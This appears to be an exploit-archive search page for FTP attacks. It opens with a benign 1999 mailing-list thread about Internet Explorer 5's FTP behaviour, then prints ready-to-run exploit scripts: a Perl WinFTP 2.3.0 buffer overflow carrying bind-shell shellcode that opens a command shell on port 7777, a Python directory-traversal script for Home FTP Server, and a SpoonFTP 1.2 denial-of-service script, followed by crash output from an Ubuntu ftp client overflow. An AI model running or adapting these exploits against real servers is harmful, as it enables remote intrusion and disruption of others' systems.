ftp password hacking
Search result for 'ftp password hacking'
(0.0382170677185 seconds)
/msie.5.typedURL.ftp.address.txt ( na)
Date: Thu, 6 May 1999 12:14:51 -0600
From: Mark <mark@NTSHOP.NET>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Odd Behavior in IE5
Has anyone noticed this?
After you visit an FTP site, IE5 places that URL in the TypedURLs list (just
like it does with Web site addresses,) as seen in the drop down "Address"
list at the top of the screen in IE5 (TypedURLs is the registry key under
HKEY_CURRENT_USER where these entries are stored.) Then if you open a new
instance of IE5 and click on the "Address" drop down list, there is a slight
delay before the list is actually displayed -- and if you watch the network,
there is activity on the network while this delay is taking place.
After putting a sniffer to work to catch this network activity, it appears
that IE5 will actually make a connection to every FTP site listed in the
Address drop down list *before* displaying the Address list -- this is what
causes the delay in displaying the list of TypedURLs in the Address drop
down list.
I haven't the foggiest idea why this needs to occur -- it makes no sense to
me, and certainly places a burden on a given FTP server as well as putting
unnecessary traffic on intranets and the internet -- not to mention any
security logs that track these connections -- plus it causes a significant
delay in displaying the Address list, especially if a FTP site is not
answering...
I wish I'd stuck with IE 4.x - doh.
Mark
-----------------------------------------------------------------------------
Date: Fri, 7 May 1999 08:42:05 -0400
From: Margaret Leber <maggie@VOICENET.COM>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Re: Odd Behavior in IE5
Mark <mark@ntshop.net> wrote:
> Has anyone noticed this?...that IE5 will actually make a connection to every
> FTP site listed in the Address drop down list *before* displaying the Address list --
I'll bet this is related to the behavior noted by Ken Williams
<jkwilli2@csc.ncsu.edu> back in April that IE5 attempts to fetch
favicon.ico from sites when you bookmark them. It sounds like an
outgrowth of the "integrated explorer" philosophy that manifests when
you start treating local filesystem folders like websites (looking for
display text and backgrounds in default "standard" filenames and the
like).
Treating a local folder as if it's a remote server is one thing.
Treating a remote server as if it's a local filesystem is quite another.
It generates unwanted and spurious network traffic, and broadcasts what
a workstation user is up to.
Requests to remote servers are *much* more expensive (to *both* ends of
the conversation) than local filesystem access, and IMHO shouldn't be
happening if the user didn't explicitly ask for them. These behavors are
startling and counterintuitive. I'm so tired of suddenly having the
lights go off in the kitchen when I flush the toilet, without knowing
why. Somebody in Redmond needs to read "The Psychology of Everyday
Things".
MS seems to think that these kinds of "decommoditizations" are a
value-add. I disagree.
--
<pre> ___________________________________________________________
...../__ __) Margaret Stephanie Leber <maggie@voicenet.com> /
..../(, /| /| http://www.voicenet.com/~maggie/maggie.html /
.../ / | / | _ _ _ ` _"The art of progress consists/
../ ) / |/ |_(_(_(_/_(_/__(__(/_ of preserving order amid /
./ (_/ ' .-/ .-/ change and change amid order."/
/________________(_/ (_/___________________A.N.Whitehead___/</pre>
-----------------------------------------------------------------------------
Date: Fri, 7 May 1999 09:43:01 -0400
From: Glen R. J. Neff <gneff@CW.NET>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Re: Odd Behavior in IE5
I too have noticed some problems with FTP in IE5. I noticed them in the
betas as well, but I thought they were so blatantly obvious that I didn't
report 'em.
The problems I've observed are with how IE5 handles passive FTP. They've
been especially apparent to me because my NT boxes at home are behind Linux
IP Masq., which requires passive mode for outgoing FTP, as does our firewall
here at work.
I've always surmised that IE4, which handles it fine, first attempts FTP
connections in non-passive mode, then switches to passive mode if necessary.
In IE5, if you select an FTP link which points directly to a file
(ftp://ftp.acme.com/pub/subdir/file.zip) it will switch to passive mode and
pull the file just fine. But if you attempt to hit a URL that specifies a
directory on an FTP server (ftp://ftp.acme.com/pub/), after a long pause,
you'll get an error dialogue like:
An error occurred opening that folder on the FTP Server.
Make sure you have permission to access that folder.
Detail:
200 Type Set to A.
200 PORT command successful.
425 Can't build data connection: Operation timed out.
Likewise, here's an example of the output from NT's command line FTP client
which has no support for passive mode:
D:\>ftp ftp.cdrom.com
Connected to wcarchive.cdrom.com.
220 wcarchive.cdrom.com FTP server (Version DG-3.1.27 Wed Dec 2 01:29:08 PST
1998) ready.
User (wcarchive.cdrom.com:(none)): anonymous
331 Guest login ok, send your email address as password.
Password:
230-Welcome to wcarchive - home FTP site for Walnut Creek CDROM.
<snip>
230 Guest login ok, access restrictions apply.
ftp> ls
200 PORT command successful.
425 Can't build data connection: Connection refused.
ftp>
And to really demonstrate my point, here's some sample output from a UN!X
based FTP client:
gneff@jedi-/home/gneff$ ftp ftp.cdrom.com
Connected to wcarchive.cdrom.com.
220 wcarchive.cdrom.com FTP server (Version DG-3.1.27 Wed Dec 2 01:29:08 PST
1998) ready.
Name (ftp.cdrom.com:gneff): anonymous
331 Guest login ok, send your email address as password.
Password:
230-Welcome to wcarchive - home FTP site for Walnut Creek CDROM.
<snip>
230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful.
425 Can't build data connection: Connection refused.
ftp> passive
Passive mode on.
ftp> ls
227 Entering Passive Mode (209,155,82,18,32,226)
150 Opening ASCII mode data connection for 'file list'.
total 91760
-rw-rw-r-- 1 root wheel 696 Nov 19 1997 README
<snip>
drwxrwxr-x 2 root wheel 2048 May 6 21:26 pub
226 Transfer complete.
ftp>
Can anyone else collaborate the problems with IE5 I've outlined here?
Glen R. J. Neff
NT Administrator
Cable & Wireless Internet Operations Center
"There is no spoon."
-----Original Message-----
>From: Windows NT BugTraq Mailing List
[mailto:NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM] On Behalf Of Mark
Sent: Thursday, May 06, 1999 14:15
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Odd Behavior in IE5
Has anyone noticed this?
<snip>
After putting a sniffer to work to catch this network activity, it appears
that IE5 will actually make a connection to every FTP site listed in the
Address drop down list *before* displaying the Address list -- this is what
causes the delay in displaying the list of TypedURLs in the Address drop
down list.
<snip>
I wish I'd stuck with IE 4.x - doh.
Mark
Microsoft Internet Explorer 5.0 contains even more bugs! MSIE 5.0 improperly utilizes Internet Standard Protocols by repeatedly attempting to connect to all ftp servers that are automatically stored in TypedURLs "Address" dropdown list. MSIE 5.0 also seems to have trouble distinguishing between local file systems and remote servers. Margaret Leber's comments in this advisory are priceless (and funny as heck too)!
Joe Walko/WinFTP 2.4.0 Buffer Overflow ( na)
#!/usr/bin/perl
#
# WinFTP 2.3.0 post-auth remote exploit. (www.wftpserver.com)
#
################################################################################
# #
# root@halcyon:~/Exploits/WinFTP# perl winftp-remote.pl #
# #
# Usage: winftp-remote.pl <host> <username> <password> <target> #
# #
# Target: 1 -> Win2k #
# Target: 2 -> WinXP sp2/3 (DoS only) #
# #
# root@halcyon:~/Exploits/WinFTP# perl winftp-remote.pl 10.0.0.5 user1 pass1 1 #
# #
# [=] Connected. #
# [=] Sending user user1 #
# [=] Sending pass pass1 #
# [=] Sending payload... #
# [=] Done. You should have a command shell on port 7777. #
# #
# root@halcyon:~/Exploits/WinFTP# nc 10.0.0.5 7777 #
# Microsoft Windows 2000 [Version 5.00.2195] #
# (C) Copyright 1985-1999 Microsoft Corp. #
# #
# C:\Program Files\WinFTP Server> #
# #
################################################################################
#
# Quick description of the exploit:
#
# There is a post-auth bug in WFTPSRV.exe (2.3.0), in the handling of the LIST
# command. This appears to be different from the previous vuln found in
# the handling of the NLIST command. Providing the server with
# "LIST *<long string here>" results in an arbitrary memory overwrite
# vulnerability. Note that simply giving LIST a long string won't trigger
# the vuln. At least in my testing, the asterisk was necessary to force
# WFTPSRV.exe to process the long string, which clobbers various stored
# addresses, providing an opportunity for an arbitrary DWORD overwrite.
# So exploitation goes like this:
#
# format string vuln -> overflow -> arbitrary memory overwrite -> EIP control
#
# On Win2k, the error is:
# "The instruction at 0x77fc9906 referenced memory at
# 0x88776655. The memory could not be "written".
#
# Which is what we want to see in order to control an arbitrary DWORD.
# At this point our registers look like:
#
# EAX 010922E0
# ECX 0275FC14
# EDX 88776655
# EBX 00000028
# ESP 0275F688
# EBP 0275F81C
# ESI 00F90000
# EDI 00F90378
# EIP 77FC9906 ntdll.77FC9906
#
# Instructions look like:
#
# 77FC98F4 8B48 08 MOV ECX,DWORD PTR DS:[EAX+8]
# 77FC98F7 898D 38FFFFFF MOV DWORD PTR SS:[EBP-C8],ECX
# 77FC98FD 8B50 0C MOV EDX,DWORD PTR DS:[EAX+C]
# 77FC9900 8995 34FFFFFF MOV DWORD PTR SS:[EBP-CC],EDX
# 77FC9906 890A MOV DWORD PTR DS:[EDX],ECX
# 77FC9908 8951 04 MOV DWORD PTR DS:[ECX+4],EDX
#
# Under normal conditions EDX and ECX contain pointers located
# in the data segment. However, after exploitation we control
# EDX (where to write), and ECX (what to write). From here,
# we load EDX with (almost) any old return address on our stack,
# and ECX with a pointer to our shellcode.
#
# Note: This is *not* a predictable vuln. I noticed even changing
# the filename of the binary causes the offsets to change.
# Please experiment on your own. Let me know if you manage to
# get it working under WinXP SP2.
# joewalko@gmail.com
use IO::Socket;
if (@ARGV < 2) {
print "\nUsage: $0 <host> <username> <password> <target>\n\n";
print "Target: 1 -> Win2k\n";
print "Target: 2 -> WinXP sp2/3 (DoS only)\n\n";
exit;
};
$host = $ARGV[0];
$username = $ARGV[1];
$password = $ARGV[2];
$port = 21;
$list = "\x4c\x49\x53\x54\x20\x2a";
$padding = "\x41" x 272;
$sock = new IO::Socket::INET
(
PeerAddr=> "$host",
PeerPort=> "$port",
Proto => 'tcp'
);
die "Connection failed: $!\n\n" unless $sock;
$user_string = "user $username\r\n";
$pass_string = "pass $password\r\n";
$port_string = "PORT 10,0,0,1,154,119\r\n"; # Source host doesn't matter.
$address2k = "\x74\xf8\x74\x02". # <- This needs to contain any
# readable address, or we
# immediately cause an exception.
"\x14\xfc\x75\x02". # <- This will become EIP. It points
# to our shellcode.
"\x74\xf8\x75\x02"; # <- This specifies what DWORD to overwrite.
# YMMV here. I picked an arbitrary
# return address on the stack located
# near where ESP was during
# the exception. On my system this
# is:
#
# 0275F874 73D34154 RETURN to MFC42.73D34154
$nopsled = "\x90" x 2228;
# Metasploit win32_bind, EXITFUNC=process LPORT=7777
$shellcode =
"\x2b\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x10".
"\x92\xe9\xd3\x83\xeb\xfc\xe2\xf4\xec\xf8\x02\x9e\xf8\x6b\x16\x2c".
"\xef\xf2\x62\xbf\x34\xb6\x62\x96\x2c\x19\x95\xd6\x68\x93\x06\x58".
"\x5f\x8a\x62\x8c\x30\x93\x02\x9a\x9b\xa6\x62\xd2\xfe\xa3\x29\x4a".
"\xbc\x16\x29\xa7\x17\x53\x23\xde\x11\x50\x02\x27\x2b\xc6\xcd\xfb".
"\x65\x77\x62\x8c\x34\x93\x02\xb5\x9b\x9e\xa2\x58\x4f\x8e\xe8\x38".
"\x13\xbe\x62\x5a\x7c\xb6\xf5\xb2\xd3\xa3\x32\xb7\x9b\xd1\xd9\x58".
"\x50\x9e\x62\xa3\x0c\x3f\x62\x93\x18\xcc\x81\x5d\x5e\x9c\x05\x83".
"\xef\x44\x8f\x80\x76\xfa\xda\xe1\x78\xe5\x9a\xe1\x4f\xc6\x16\x03".
"\x78\x59\x04\x2f\x2b\xc2\x16\x05\x4f\x1b\x0c\xb5\x91\x7f\xe1\xd1".
"\x45\xf8\xeb\x2c\xc0\xfa\x30\xda\xe5\x3f\xbe\x2c\xc6\xc1\xba\x80".
"\x43\xc1\xaa\x80\x53\xc1\x16\x03\x76\xfa\xf7\xb2\x76\xc1\x60\x32".
"\x85\xfa\x4d\xc9\x60\x55\xbe\x2c\xc6\xf8\xf9\x82\x45\x6d\x39\xbb".
"\xb4\x3f\xc7\x3a\x47\x6d\x3f\x80\x45\x6d\x39\xbb\xf5\xdb\x6f\x9a".
"\x47\x6d\x3f\x83\x44\xc6\xbc\x2c\xc0\x01\x81\x34\x69\x54\x90\x84".
"\xef\x44\xbc\x2c\xc0\xf4\x83\xb7\x76\xfa\x8a\xbe\x99\x77\x83\x83".
"\x49\xbb\x25\x5a\xf7\xf8\xad\x5a\xf2\xa3\x29\x20\xba\x6c\xab\xfe".
"\xee\xd0\xc5\x40\x9d\xe8\xd1\x78\xbb\x39\x81\xa1\xee\x21\xff\x2c".
"\x65\xd6\x16\x05\x4b\xc5\xbb\x82\x41\xc3\x83\xd2\x41\xc3\xbc\x82".
"\xef\x42\x81\x7e\xc9\x97\x27\x80\xef\x44\x83\x2c\xef\xa5\x16\x03".
"\x9b\xc5\x15\x50\xd4\xf6\x16\x05\x42\x6d\x39\xbb\xe0\x18\xed\x8c".
"\x43\x6d\x3f\x2c\xc0\x92\xe9\xd3\x0d\x0a";
if ($ARGV[3] == '1')
{
$payload = $list.$padding.$address2k.$nopsled.$shellcode;
}
elsif ($ARGV[3] == '2')
{
$payload = $list.$padding.$address2k.$nopsled.$shellcode;
}
else
{
$payload = $list.$padding.$address2k.$nopsled.$shellcode;
}
print "\n[=] Connected.\n";
sleep 1;
print "[=] Sending $user_string";
$sock->send($user_string);
sleep 1;
print "[=] Sending $pass_string";
$sock->send($pass_string);
sleep 1;
$sock->send($port_string);
sleep 1;
print "[=] Sending payload...\n";
$sock->send($payload);
sleep 1;
if ($ARGV[3] == '1')
{
print "[=] Done. You should have a command shell on port 7777.\n\n";
}
elsif ($ARGV[3] == '2')
{
print "[=] Done. WinFTP should be crashed on the remote host.\n\n";
}
else
{
print "[=] Done.\n\n";
}
WinFTP version 2.3.0 post authentication remote buffer overflow exploit that spawns a shell on port 7777.
zhangmc/Home FTP Server 'MKD' Command Directory Traversal Vulnerability ( windows)
#!/usr/bin/python
import socket
import sys
def Usage():
print ("Usage: ./expl.py <serv_ip> <Username> <password>\n")
print ("Example:./expl.py 192.168.48.183 anonymous anonymous\n")
if len(sys.argv) <> 4:
Usage()
sys.exit(1)
else:
hostname=sys.argv[1]
username=sys.argv[2]
passwd=sys.argv[3]
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect((hostname, 21))
except:
print ("Connection error!")
sys.exit(1)
r=sock.recv(1024)
sock.send("user %s\r\n" %username)
r=sock.recv(1024)
sock.send("pass %s\r\n" %passwd)
r=sock.recv(1024)
sock.send("MKD ../A\r\n")
sock.close()
sys.exit(0);
C4SS!0 G0M3S/SpoonFTP 1.2 Denial Of Service ( na)
#!/usr/bin/python
#
#
#[+]Exploit Title: Exploit Denial of Service SpoonFTP 1.2
#[+]Date: 03\18\2011
#[+]Author: C4SS!0 G0M3S
#[+]Software Link: http://www.softpedia.com/progDownload/SpoonFTP-Download-49969.html
#[+]Version: 1.2
#[+]Tested On: WIN-XP SP3 Portuguese Brazil
#[+]CVE: N/A
#
#
# xxx xxx xxxxxxxxxxx xxxxxxxxxxx xxxxxxxxxxx
# xxx xxx xxxxxxxxxxxxx xxxxxxxxxxxxx xxxxxxxxxxxxx
# xxx xxx xxxxxxxxxxxxx xxxxxxxxxxxxx xxxxxxxxxxxxx
# xxxxx xxx xxx xxx xxx xxx xxx xxxxxx
# xxx xxx xxx xxx xxx xxx xxx xxxxxxxx xxxxxxxx xxxxxxxxx
# xxxxxx xxx xxx xxx xxx xxx xxx xx xx xx xx xx
# xxx xxx xxx xxx xxx xxx xxx xxx xx xx xx xxxx xx xxxxx
# xxx xxx xxxxxxxxxxxxx xxxxxxxxxxxxx xxxxxxxxxxxxx xxx xxxxxxxx xx xx xx xx
# xxx xxx xxxxxxxxxxx xxxxxxxxxxx xxxxxxxxxxx xxx xxxxxx xx xx xxxxxxxxx
#
#Criado por C4SS!0 G0M3S
#E-mail Louredo_@hotmail.com
#Site www.exploit-br.org
#
#
from socket import *
import os
import sys
from time import sleep
if os.name == 'nt':
os.system("cls")
os.system("color 4f")
else:
os.system("clear")
def usage():
print """
===================================================
===================================================
==========Exploit Denial of Service SpoonFTP=======
==========Autor C4SS!0 G0M3S=======================
==========E-mail Louredo_@hotmail.com==============
==========Site www.exploit-br.org==================
===================================================
===================================================
"""
if len(sys.argv) !=5:
usage()
print "\t\t[-]Usage: %s <Host> <Port> <User> <Pass>" % sys.argv[0]
print "\t\t[-]Exemple: %s 192.168.1.2 21 admin pass" % sys.argv[0]
sys.exit(0)
host = sys.argv[1]
porta = int(sys.argv[2])
user = sys.argv[3]
pasw = sys.argv[4]
exploit = "/\\" * (6000/3)
usage()
print "\t\t[+]Connecting to Server "+host+"...\n"
sleep(1)
s = socket(AF_INET,SOCK_STREAM)
try:
s.connect((host,porta))
print "\t\t[+]Checking if server is vulnerable\n"
sleep(1)
banner = s.recv(2000)
if banner.find("SpoonFTP V1.2") == -1:
print "\t\t[+]I'm sorry, server is not vulnerable:(\n"
sleep(1)
sys.exit(0x00)
print "\t\t[+]Making Loging On Server\n"
sleep(1)
s.send("USER "+user+"\r\n")
s.recv(200)
s.send("PASS "+pasw+"\r\n")
check = s.recv(2000)
if check.find("230") == -1:
print "\t\t[+]Error on Login, Check Your Username or Password\n"
sleep(1)
sys.exit(0)
print "\t\t[+]Sending Exploit...\n"
sleep(1)
s.send("RETR "+exploit+"\r\n")
s.close()
print "\t\t[+]Submitted Exploit Success\n"
sleep(1)
print "\t\t[+]Checking if the exploit works\n"
sleep(1)
try:
so = socket(AF_INET,SOCK_STREAM)
s.connect((host,porta))
print "\t\t[+]I'm Sorry, But Not Worked Exploit:(\n"
sleep(1)
except:
print "\t\t[+]Congratulations, worked with the Exploit Success:)\n"
sleep(1)
except:
print "\t\t[+]Error connecting to Server\n"
sleep(1)
SpoonFTP version 1.2 remote denial of service exploit.
localh0t/Ubuntu 11.04 FTP Client Buffer Overflow ( na)
Ubuntu 11 (and below) ftp client seems to crash when passing large arguments to the "account" command, while a connection is made to any ftp server. Example:
Ubuntu 11.04 x86:
=================
(gdb) run 10.0.0.8
Starting program: /usr/bin/ftp 10.0.0.8
Connected to 10.0.0.8.
220 debianita FTP server ready.
Name (10.0.0.8:kron0): anonymous
331 Guest login ok, send your complete e-mail address as password.
Password:
230-Welcome, archive user ftp@10.0.0.9 !
230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> account AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
*** buffer overflow detected ***: /usr/bin/ftp terminated
======= Backtrace: =========
/lib/i386-linux-gnu/libc.so.6(__fortify_fail+0x50)[0x27fdf0]
/lib/i386-linux-gnu/libc.so.6(+0xe4cca)[0x27ecca]
/lib/i386-linux-gnu/libc.so.6(+0xe41ed)[0x27e1ed]
/usr/bin/ftp[0x804b5e2]
/usr/bin/ftp[0x8055ead]
/lib/i386-linux-gnu/libc.so.6(__libc_start_main+0xe7)[0x1b0e37]
/usr/bin/ftp[0x8049d61]
======= Memory map: ========
00110000-0012c000 r-xp 00000000 08:01 525108 /lib/i386-linux-gnu/ld-2.13.so
0012c000-0012d000 r--p 0001b000 08:01 525108 /lib/i386-linux-gnu/ld-2.13.so
0012d000-0012e000 rw-p 0001c000 08:01 525108 /lib/i386-linux-gnu/ld-2.13.so
0012e000-0012f000 r-xp 00000000 00:00 0 [vdso]
0012f000-0015d000 r-xp 00000000 08:01 524378 /lib/libreadline.so.6.2
0015d000-0015e000 r--p 0002e000 08:01 524378 /lib/libreadline.so.6.2
0015e000-00161000 rw-p 0002f000 08:01 524378 /lib/libreadline.so.6.2
00161000-00162000 rw-p 00000000 00:00 0
00162000-00196000 r-xp 00000000 08:01 524347 /lib/libncurses.so.5.7
00196000-00197000 ---p 00034000 08:01 524347 /lib/libncurses.so.5.7
00197000-00199000 r--p 00034000 08:01 524347 /lib/libncurses.so.5.7
00199000-0019a000 rw-p 00036000 08:01 524347 /lib/libncurses.so.5.7
0019a000-002f4000 r-xp 00000000 08:01 525121 /lib/i386-linux-gnu/libc-2.13.so
002f4000-002f5000 ---p 0015a000 08:01 525121 /lib/i386-linux-gnu/libc-2.13.so
002f5000-002f7000 r--p 0015a000 08:01 525121 /lib/i386-linux-gnu/libc-2.13.so
002f7000-002f8000 rw-p 0015c000 08:01 525121 /lib/i386-linux-gnu/libc-2.13.so
002f8000-002fb000 rw-p 00000000 00:00 0
002fb000-002fd000 r-xp 00000000 08:01 525131 /lib/i386-linux-gnu/libdl-2.13.so
002fd000-002fe000 r--p 00001000 08:01 525131 /lib/i386-linux-gnu/libdl-2.13.so
002fe000-002ff000 rw-p 00002000 08:01 525131 /lib/i386-linux-gnu/libdl-2.13.so
002ff000-00309000 r-xp 00000000 08:01 525167 /lib/i386-linux-gnu/libnss_files-2.13.so
00309000-0030a000 r--p 00009000 08:01 525167 /lib/i386-linux-gnu/libnss_files-2.13.so
0030a000-0030b000 rw-p 0000a000 08:01 525167 /lib/i386-linux-gnu/libnss_files-2.13.so
0030b000-00311000 r-xp 00000000 08:01 525163 /lib/i386-linux-gnu/libnss_compat-2.13.so
00311000-00312000 r--p 00005000 08:01 525163 /lib/i386-linux-gnu/libnss_compat-2.13.so
00312000-00313000 rw-p 00006000 08:01 525163 /lib/i386-linux-gnu/libnss_compat-2.13.so
00313000-00326000 r-xp 00000000 08:01 525161 /lib/i386-linux-gnu/libnsl-2.13.so
00326000-00327000 r--p 00012000 08:01 525161 /lib/i386-linux-gnu/libnsl-2.13.so
00327000-00328000 rw-p 00013000 08:01 525161 /lib/i386-linux-gnu/libnsl-2.13.so
00328000-0032a000 rw-p 00000000 00:00 0
0032a000-00333000 r-xp 00000000 08:01 525171 /lib/i386-linux-gnu/libnss_nis-2.13.so
00333000-00334000 r--p 00008000 08:01 525171 /lib/i386-linux-gnu/libnss_nis-2.13.so
00334000-00335000 rw-p 00009000 08:01 525171 /lib/i386-linux-gnu/libnss_nis-2.13.so
00335000-0034f000 r-xp 00000000 08:01 525149 /lib/i386-linux-gnu/libgcc_s.so.1
0034f000-00350000 r--p 00019000 08:01 525149 /lib/i386-linux-gnu/libgcc_s.so.1
00350000-00351000 rw-p 0001a000 08:01 525149 /lib/i386-linux-gnu/libgcc_s.so.1
08048000-08059000 r-xp 00000000 08:01 1573707 /usr/bin/netkit-ftp
08059000-0805a000 r--p 00011000 08:01 1573707 /usr/bin/netkit-ftp
0805a000-0805b000 rw-p 00012000 08:01 1573707 /usr/bin/netkit-ftp
0805b000-080ab000 rw-p 00000000 00:00 0 [heap]
b7dee000-b7fee000 r--p 00000000 08:01 1581098 /usr/lib/locale/locale-archive
b7fee000-b7ff0000 rw-p 00000000 00:00 0
b7ff9000-b7ffa000 r--p 002a1000 08:01 1581098 /usr/lib/locale/locale-archive
b7ffa000-b8000000 rw-p 00000000 00:00 0
bffdf000-c0000000 rw-p 00000000 00:00 0 [stack]
Program received signal SIGABRT, Aborted.
0x0012e416 in __kernel_vsyscall ()
(gdb) i r
eax 0x0 0
ecx 0xc8e 3214
edx 0x6 6
ebx 0xc8e 3214
esp 0xbfffdde4 0xbfffdde4
ebp 0xbfffddf0 0xbfffddf0
esi 0x0 0
edi 0x2f6ff4 3108852
eip 0x12e416 0x12e416 <__kernel_vsyscall+2>
eflags 0x246 [ PF ZF IF ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
(gdb)
============================================================================================================================================================
Ubuntu 11.04 x64 and Backtrack 5 R1 (which is based in Ubuntu) crash, too:
==========================================================================
Ubuntu 11.04 x64:
=================
$ gdb /usr/bin/ftp
GNU gdb (Ubuntu/Linaro 7.2-1ubuntu11) 7.2
Copyright (C) 2010 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Para las instrucciones de informe de errores, vea:
<http://www.gnu.org/software/gdb/bugs/>...
Leyendo símbolos desde /usr/bin/ftp...(no se encontraron símbolos de depuración)hecho.
(gdb) run 10.0.0.8
Starting program: /usr/bin/ftp 10.0.0.8
Connected to 10.0.0.8.
220 debianita FTP server ready.
Name (10.0.0.8:kron0): anonymous
331 Guest login ok, send your complete e-mail address as password.
Password:
230-Welcome, archive user ftp@10.0.0.5 !
230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> account AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
*** buffer overflow detected ***: /usr/bin/ftp terminated
======= Backtrace: =========
/lib/x86_64-linux-gnu/libc.so.6(__fortify_fail+0x37)[0x7ffff76c01d7]
/lib/x86_64-linux-gnu/libc.so.6(+0xfd0f0)[0x7ffff76bf0f0]
/lib/x86_64-linux-gnu/libc.so.6(+0xfc264)[0x7ffff76be264]
/usr/bin/ftp[0x404039]
/usr/bin/ftp[0x40ec18]
/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xff)[0x7ffff75e0eff]
/usr/bin/ftp[0x402889]
======= Memory map: ========
00400000-00414000 r-xp 00000000 08:03 262461 /usr/bin/netkit-ftp
00613000-00614000 r--p 00013000 08:03 262461 /usr/bin/netkit-ftp
00614000-00616000 rw-p 00014000 08:03 262461 /usr/bin/netkit-ftp
00616000-00687000 rw-p 00000000 00:00 0 [heap]
7ffff62e2000-7ffff62f7000 r-xp 00000000 08:03 1442972 /lib/x86_64-linux-gnu/libgcc_s.so.1
7ffff62f7000-7ffff64f6000 ---p 00015000 08:03 1442972 /lib/x86_64-linux-gnu/libgcc_s.so.1
7ffff64f6000-7ffff64f7000 r--p 00014000 08:03 1442972 /lib/x86_64-linux-gnu/libgcc_s.so.1
7ffff64f7000-7ffff64f8000 rw-p 00015000 08:03 1442972 /lib/x86_64-linux-gnu/libgcc_s.so.1
7ffff64f8000-7ffff6b82000 r--p 00000000 08:03 269561 /usr/lib/locale/locale-archive
7ffff6b82000-7ffff6b8d000 r-xp 00000000 08:03 1442994 /lib/x86_64-linux-gnu/libnss_nis-2.13.so
7ffff6b8d000-7ffff6d8c000 ---p 0000b000 08:03 1442994 /lib/x86_64-linux-gnu/libnss_nis-2.13.so
7ffff6d8c000-7ffff6d8d000 r--p 0000a000 08:03 1442994 /lib/x86_64-linux-gnu/libnss_nis-2.13.so
7ffff6d8d000-7ffff6d8e000 rw-p 0000b000 08:03 1442994 /lib/x86_64-linux-gnu/libnss_nis-2.13.so
7ffff6d8e000-7ffff6da5000 r-xp 00000000 08:03 1442984 /lib/x86_64-linux-gnu/libnsl-2.13.so
7ffff6da5000-7ffff6fa4000 ---p 00017000 08:03 1442984 /lib/x86_64-linux-gnu/libnsl-2.13.so
7ffff6fa4000-7ffff6fa5000 r--p 00016000 08:03 1442984 /lib/x86_64-linux-gnu/libnsl-2.13.so
7ffff6fa5000-7ffff6fa6000 rw-p 00017000 08:03 1442984 /lib/x86_64-linux-gnu/libnsl-2.13.so
7ffff6fa6000-7ffff6fa8000 rw-p 00000000 00:00 0
7ffff6fa8000-7ffff6fb0000 r-xp 00000000 08:03 1442986 /lib/x86_64-linux-gnu/libnss_compat-2.13.so
7ffff6fb0000-7ffff71af000 ---p 00008000 08:03 1442986 /lib/x86_64-linux-gnu/libnss_compat-2.13.so
7ffff71af000-7ffff71b0000 r--p 00007000 08:03 1442986 /lib/x86_64-linux-gnu/libnss_compat-2.13.so
7ffff71b0000-7ffff71b1000 rw-p 00008000 08:03 1442986 /lib/x86_64-linux-gnu/libnss_compat-2.13.so
7ffff71b1000-7ffff71bd000 r-xp 00000000 08:03 1442990 /lib/x86_64-linux-gnu/libnss_files-2.13.so
7ffff71bd000-7ffff73bc000 ---p 0000c000 08:03 1442990 /lib/x86_64-linux-gnu/libnss_files-2.13.so
7ffff73bc000-7ffff73bd000 r--p 0000b000 08:03 1442990 /lib/x86_64-linux-gnu/libnss_files-2.13.so
7ffff73bd000-7ffff73be000 rw-p 0000c000 08:03 1442990 /lib/x86_64-linux-gnu/libnss_files-2.13.so
7ffff73be000-7ffff73c0000 r-xp 00000000 08:03 1442954 /lib/x86_64-linux-gnu/libdl-2.13.so
7ffff73c0000-7ffff75c0000 ---p 00002000 08:03 1442954 /lib/x86_64-linux-gnu/libdl-2.13.so
7ffff75c0000-7ffff75c1000 r--p 00002000 08:03 1442954 /lib/x86_64-linux-gnu/libdl-2.13.so
7ffff75c1000-7ffff75c2000 rw-p 00003000 08:03 1442954 /lib/x86_64-linux-gnu/libdl-2.13.so
7ffff75c2000-7ffff774c000 r-xp 00000000 08:03 1442944 /lib/x86_64-linux-gnu/libc-2.13.so
7ffff774c000-7ffff794b000 ---p 0018a000 08:03 1442944 /lib/x86_64-linux-gnu/libc-2.13.so
7ffff794b000-7ffff794f000 r--p 00189000 08:03 1442944 /lib/x86_64-linux-gnu/libc-2.13.so
7ffff794f000-7ffff7950000 rw-p 0018d000 08:03 1442944 /lib/x86_64-linux-gnu/libc-2.13.so
7ffff7950000-7ffff7956000 rw-p 00000000 00:00 0
7ffff7956000-7ffff7996000 r-xp 00000000 08:03 1439035 /lib/libncurses.so.5.7
